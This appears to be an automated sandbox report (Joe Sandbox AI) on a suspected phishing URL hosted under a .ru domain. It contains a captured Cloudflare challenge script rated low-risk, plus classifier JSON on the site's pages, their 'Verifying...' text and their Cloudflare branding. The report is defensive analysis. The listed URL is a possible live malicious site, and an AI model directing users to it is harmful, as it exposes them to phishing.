md: 'HRc.yJ8DfW1eu5mO.6jw45F6Kzf_IuCTnN4fC9fuIkQ-1734381177-1.1.1.1-3THWI9VbtQ8iue8c0AezBOk.C8FsuDVVu1E7xC1Hg3Y_vnSVFY4zqvRhE83A.E2QCyT4HezAUXA2ZmXjeyIvD7qqGdIex1u.dCZvuHb1BYtcJcqJr3FUrPfq8B.wM8tGLAOWzjOfi99AbkD1RCIDZBvvDv6EJWUA22hTiWfDpJcBgSu7.Cu4Y6ZWm9w.alKS_gq4NeQLbmswPRa9UNgZGI5rbUoEB7F8kX7kgdA.FfgEobMjr8PhMHOzrloOB2Bns1h57Jdc5hUinEXYk4QrvHqHGIRsGbgLQbM.JvnYPGTP4Pr1320svl7C681I4XDbDsLw3I_gGszeQxZFeNIIl63bQtp4osjRXscbcfPw3zK6FGcVaJv6GMTov6dXudXwJXZAYCUsxTjecNncJs9gXQiasekS7.pPnm2WRX2m2O4Qen_zwZ7oraoOqRPxvWEM9y28bIP4jDOdd.RC_WZMVAI1QXy_zcoKZ3rSiyuPKrU4ZhbwXt8dp_T3ep0qgky2iJwAbZ6WYTs9Dll_Xvx2ibjgwe8H8_kW.ABckqdM3D0lwpcKiVtQTZYp2Xk.PH8IJ.3mHdPyqd6ldVVvhHFffjfK0HpDeRVM7ffBeKk378jnWyIu1Kz48w3km1KlChsovOFN1Xh8MXQK9ZIkhhYv2ce5GoExLg0j1kf38JRm2Rgh0guqYzeD5SMbxd35KA0taCJUPNeX7oQCnyJ0KX7V3ZMKqQaT_hP02JaSSV
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script sets up various configuration options for the Cloudflare challenge and includes functionality to handle communication between the challenge and the parent window. While the script uses some techniques that could be considered moderately risky, such as dynamic message handling and communication with external domains, these behaviors are likely part of the legitimate Cloudflare challenge implementation and do not indicate malicious intent. Overall, the script appears to be a benign security mechanism and does not demonstrate high-risk indicators."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'odxgc',
chlApiSitekey: '0x4AAAAAAA0MpIT_R9fG8S2s',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'BzKZRJaIJGXs1JT8BdF1pLYbfq_09Kz3TDCuM3QJ_8k-1734381177-1.3.1.1-N1zqsH.3HotLOP8smeAmEOKC_zQdD.qA925YBJIcqn0',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f3172179ac67c7b',
cH: 'XvcW7PXPitT.oRL1B4Sdfsa4S2Um.4Q1KsGhubsXJPI-1734381177-1.1.1.1-HwPQzq99Znn1hUobXdybAoQXayOnQ3LqzdOHFCdO27JaAqE5BaNkuBA40Bym7hMk',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'HRc.yJ8DfW1eu5mO.6jw45F6Kzf_IuCTnN4fC9fuIkQ-1734381177-1.1.1.1-3THWI9VbtQ8iue8c0AezBOk.C8FsuDVVu1E7xC1Hg3Y_vnSVFY4zqvRhE83A.E2QCyT4HezAUXA2ZmXjeyIvD7qqGdIex1u.dCZvuHb1BYtcJcqJr3FUrPfq8B.wM8tGLAOWzjOfi99AbkD1RCIDZBvvDv6EJWUA22hTiWfDpJcBgSu7.Cu4Y6ZWm9w.alKS_gq4NeQLbmswPRa9UNgZGI5rbUoEB7F8kX7kgdA.FfgEobMjr8PhMHOzrloOB2Bns1h57Jdc5hUinEXYk4QrvHqHGIRsGbgLQbM.JvnYPGTP4Pr1320svl7C681I4XDbDsLw3I_gGszeQxZFeNIIl63bQtp4osjRXscbcfPw3zK6FGcVaJv6GMTov6dXudXwJXZAYCUsxTjecNncJs9gXQiasekS7.pPnm2WRX2m2O4Qen_zwZ7oraoOqRPxvWEM9y28bIP4jDOdd.RC_WZMVAI1QXy_zcoKZ3rSiyuPKrU4ZhbwXt8dp_T3ep0qgky2iJwAbZ6WYTs9Dll_Xvx2ibjgwe8H8_kW.ABckqdM3D0lwpcKiVtQTZYp2Xk.PH8IJ.3mHdPyqd6ldVVvhHFffjfK0HpDeRVM7ffBeKk378jnWyIu1Kz48w3km1KlChsovOFN1Xh8MXQK9ZIkhhYv2ce5GoExLg0j1kf38JRm2Rgh0guqYzeD5SMbxd35KA0taCJUPNeX7oQCnyJ0KX7V3ZMKqQaT_hP02JaSSVNDdZSE13PAaKhS7p.cli.ckZKLObq.JnVHD3V1Xcb6mJtUMJPIKavLv71_7wuwTVWzfs2cYRmrvjf.ffeCeISfgNS4rckifTwsMk2eQ8F0wZPIvMpeCvn0.54qUgit61RxI48s_WktThCXDVPD7IWUtHi99JtyGZFUK2lYZ80XnckDCYrRdZ8VP8NVQeSUdEsIhIVscM0yKOrwHu1YvVELyHOGM1Tx8oP5aQO78aGZigRWQORWX8NPT2f5VYJpOF22N4dXBX6te5yl__ny_sU2b.tRJb.3BmurMPjimtBUh5J01m2aZlSNYsgIJD6S7hm7e8jY6medlQESCIdds4xeW8qyNXiM2EWKTcQY18RGXIdV7JRjce1J7RvE6W6pd.cLxQrKbC_c5zCY5YgknIgfFGyhOr9EJbGCXUit.ZBu.cmrWg4O_UnqwNlZedBFyfPz6IjYXFRdhTmo9OmA2GrZOCEfl.OHMVnvxKIhB8CXCsX.GzavSjq3830KDAnW3USWAyNkhfo46.Z2m2kYeb6pmQhq1YdGuKw7XDVVvoCA8DP2.Ve2CogICteU36WuKU8DZEc4MSCKHXWGlRPmzH7TcM5lOeV0XGVDaO3bx_i4VOhydecpz6dhZl_eEcy8xjPlnZnQM4LyldgemmAh.SnsPmZN0ZbhV2CC2SzbHekWW3QG.w',
cITimeS: '1734381177',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'odxgc',
nextRcV: 'BzKZRJaIJGXs1JT8BdF1pLYbfq_09Kz3TDCuM3QJ_8k-1734381177-1.3.1.1-N1zqsH.3HotLOP8smeAmEOKC_zQdD.qA925YBJIcqn0',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://pkyv.jaaqwamco.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://pkyv.jaaqwamco.ru |
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": true
} |
|
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Running checks on your browser for safe browsing.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": true
} |
|
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|